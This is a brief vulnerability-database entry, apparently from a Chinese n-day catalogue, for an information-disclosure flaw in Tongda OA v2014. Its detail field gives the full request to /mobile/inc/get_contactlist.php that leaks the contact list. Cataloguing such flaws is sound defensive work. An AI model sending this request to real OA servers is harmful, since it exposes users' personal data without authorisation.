vendor = "通达"
name = "通达OA v2014 get_contactlist.php 敏感信息泄漏"
type = "信息泄露"
version = "v2014"
path = "/mobile/inc/get_contactlist.php"
detail = "/mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3"
fix = "老洞，有人当新洞发"
date = "0705"
label = "nday"
verifier = "AdySec"
